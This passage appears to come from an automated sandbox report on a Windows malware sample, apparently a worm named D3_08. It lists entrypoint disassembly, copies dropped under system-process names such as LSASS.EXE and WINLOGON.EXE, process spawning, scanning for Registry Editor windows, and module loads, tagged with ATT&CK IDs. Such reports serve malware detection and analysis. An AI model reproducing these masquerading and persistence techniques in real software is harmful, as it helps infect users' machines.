al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"New Folder.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"WINLOGON.EXE.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"CSRSS.EXE.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"SERVICES.EXE\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"IEXPLORER.EXE.67EE4669.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"LSASS.EXE\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"IEXPLORER.EXE.67EE4994.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"MrD3_08.scr\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"D3_08.EXE.67EE4992.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"D3_08.EXE.67EE4667.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"10001100e0121475@rsaenh.dll\"\n \"08000900d4121475@rsaenh.dll\"\n \"0b000c00c8121475@rsaenh.dll\"\n \"0c000d00b8121475@rsaenh.dll\"\n \"0d000e00a8121475@rsaenh.dll\"\n \"0d000e0098121475@rsaenh.dll\"\n \"0b000c008c121475@rsaenh.dll\"\n \"0b000c0080121475@rsaenh.dll\"\n \"09000a0074121475@rsaenh.dll\"\n \"09000a0068121475@rsaenh.dll\"\n \"0c000d0058121475@rsaenh.dll\"\n \"0a000b004c121475@rsaenh.dll\"\n \"1000110038121475@rsaenh.dll\"\n \"0d000e0028121475@rsaenh.dll\"\n \"0a000b001c121475@rsaenh.dll\"\n \"1100120008121475@rsaenh.dll\"\n \"0b000c00fc111475@rsaenh.dll\"\n \"0c000d00ec111475@rsaenh.dll\"\n \"0e000f00dc111475@rsaenh.dll\"\n \"0e000f00cc111475@rsaenh.dll\"\n \"0e000f00bc111475@rsaenh.dll\"\n \"0e000f00ac111475@rsaenh.dll\"\n \"0e000f009c111475@rsaenh.dll\"\n \"0f0010008c111475@rsaenh.dll\"\n \"15001600c03e836b@ADVAPI32.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateDirectoryA\" with parameter C:\\\\D3_08 (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateDirectoryA\" with parameter Z:\\\\D3_08 (UID: 00000000-00005136)\n \"D3_08.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005404)\n \"D3_08.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005404)\n \"D3_08.exe\" called \"CreateDirectoryA\" with parameter Z:\\\\D3_08 (UID: 00000000-00005404)\n \"IExplorer.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005412)\n \"IExplorer.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005412)\n \"WINLOGON.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005156)\n \"WINLOGON.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005156)\n \"CSRSS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005628)\n \"CSRSS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005628)\n \"SERVICES.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005808)\n \"SERVICES.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005808)\n \"LSASS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00003448)\n \"LSASS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00003448)\n \"SMSS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005072)\n \"SMSS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005072)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\D3_08.exe\" - (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00005136)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\D3_08.exe\" - (UID: 00000000-00005404)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00005404)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00005404)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00005404)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00005404)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00005404)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00005404)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\D3_08.exe\" - (UID: 00000000-00005412)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00005412)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00005412)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00005412)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00005412)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00005412)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96\" has an executable section named \".text\"\n \"services.exe\" has an executable section named \".text\"\n \"D3_08.exe\" has an executable section named \".text\"\n \"shell.exe\" has an executable section named \".text\"\n \"Data HAPUBWS.exe\" has an executable section named \".text\"\n \"Empty.pif\" has an executable section named \".text\"\n \"New Folder.exe\" has an executable section named \".text\"\n \"WINLOGON.EXE.bin\" has an executable section named \".text\"\n \"CSRSS.EXE.bin\" has an executable section named \".text\"\n \"SERVICES.EXE\" has an executable section named \".text\"\n \"IEXPLORER.EXE.67EE4669.bin\" has an executable section named \".text\"\n \"LSASS.EXE\" has an executable section named \".text\"\n \"IEXPLORER.EXE.67EE4994.bin\" has an executable section named \".text\"\n \"MrD3_08.scr\" has an executable section named \".text\"\n \"D3_08.EXE.67EE4992.bin\" has an executable section named \".text\"\n \"D3_08.EXE.67EE4667.bin\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96\" has an writable section named \".data\"\n \"services.exe\" has an writable section named \".data\"\n \"D3_08.exe\" has an writable section named \".data\"\n \"shell.exe\" has an writable section named \".data\"\n \"Data HAPUBWS.exe\" has an writable section named \".data\"\n \"Empty.pif\" has an writable section named \".data\"\n \"New Folder.exe\" has an writable section named \".data\"\n \"WINLOGON.EXE.bin\" has an writable section named \".data\"\n \"CSRSS.EXE.bin\" has an writable section named \".data\"\n \"SERVICES.EXE\" has an writable section named \".data\"\n \"IEXPLORER.EXE.67EE4669.bin\" has an writable section named \".data\"\n \"LSASS.EXE\" has an writable section named \".data\"\n \"IEXPLORER.EXE.67EE4994.bin\" has an writable section named \".data\"\n \"MrD3_08.scr\" has an writable section named \".data\"\n \"D3_08.EXE.67EE4992.bin\" has an writable section named \".data\"\n \"D3_08.EXE.67EE4667.bin\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-70", "type": 6, "relevance": 10, "name": "Scanning for window names", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" searching for class \"RegEdit_RegEdit\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" searching for window \"Registry Editor\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" searching for window \"Folder Options\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" searching for window \"Local Settings\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" searching for class \"ExploreWClass\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" searching for class \"CabinetWClass\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" searching for class \"RebarWindow32\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" searching for class \"ComboBoxEx32\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" searching for class \"ComboBox\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" searching for class \"Edit\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" searching for class \"#32770\"", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" loaded module \"ADVAPI32.DLL\" at base 779b0000\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" loaded module \"CRYPTBASE.DLL\" at base 75630000\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" loaded module \"DWMAPI.DLL\" at base 74050000\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" loaded module \"KERNEL32.DLL\" at base 76f20000\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" loaded module \"SHELL32.DLL\" at base 76180000\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" loaded module \"OLE32.DLL\" at base 77140000\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" loaded module \"COMCTL32.DLL\" at base 74600000\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" loaded module \"OLEAUT32.DLL\" at base 77440000\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" loaded module \"CLBCATQ.DLL\" at base 770b0000\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74280000\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76f20000\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" loaded module \"SETUPAPI.DLL\" at base 772a0000\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" loaded module \"RPCRT4.DLL\" at base 76e70000\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" loaded module \"NTMARTA.DLL\" at base 74ba0000\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" loaded module \"USER32\" at base 77760000\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 755e0000\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71130000\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"D3_08.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"D3_08.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bae0000\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74ed0000\n \"D3_08.exe\" loaded module \"ADVAPI32.DLL\" at base 779b0000\n \"D3_08.exe\" loaded module \"CRYPTBASE.DLL\" at base 75630000\n \"D3_08.exe\" loaded module \"DWMAPI.DLL\" at base 74050000\n \"D3_08.exe\" loaded module \"KERNEL32.DLL\" at base 76f20000\n \"D3_08.exe\" loaded module \"SHELL32.DLL\" at base 76180000\n \"D3_08.exe\" loaded module \"OLE32.DLL\" at base 77140000\n \"D3_08.exe\" loaded module \"COMCTL32.DLL\" at base 74600000\n \"D3_08.exe\" loaded module \"OLEAUT32.DLL\" at base 77440000\n \"D3_08.exe\" loaded module \"CLBCATQ.DLL\" at base 770b0000\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76f20000\n \"D3_08.exe\" loaded module \"SETUPAPI.DLL\" at base 772a0000\n \"D3_08.exe\" loaded module \"RPCRT4.DLL\" at base 76e70000\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74280000\n \"D3_08.exe\" loaded module \"NTMARTA.DLL\" at base 74ba0000\n \"D3_08.exe\" loaded module \"USER32\" at base 77760000\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 755e0000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74530000\n \"IExplorer.exe\" loaded module \"OLEAUT32.DLL\" at base 77440000\n \"IExplorer.exe\" loaded module \"SXS.DLL\" at base 75640000\n \"IExplorer.exe\" loaded module \"CRYPTSP.DLL\" at base 75140000\n \"IExplorer.exe\" loaded module 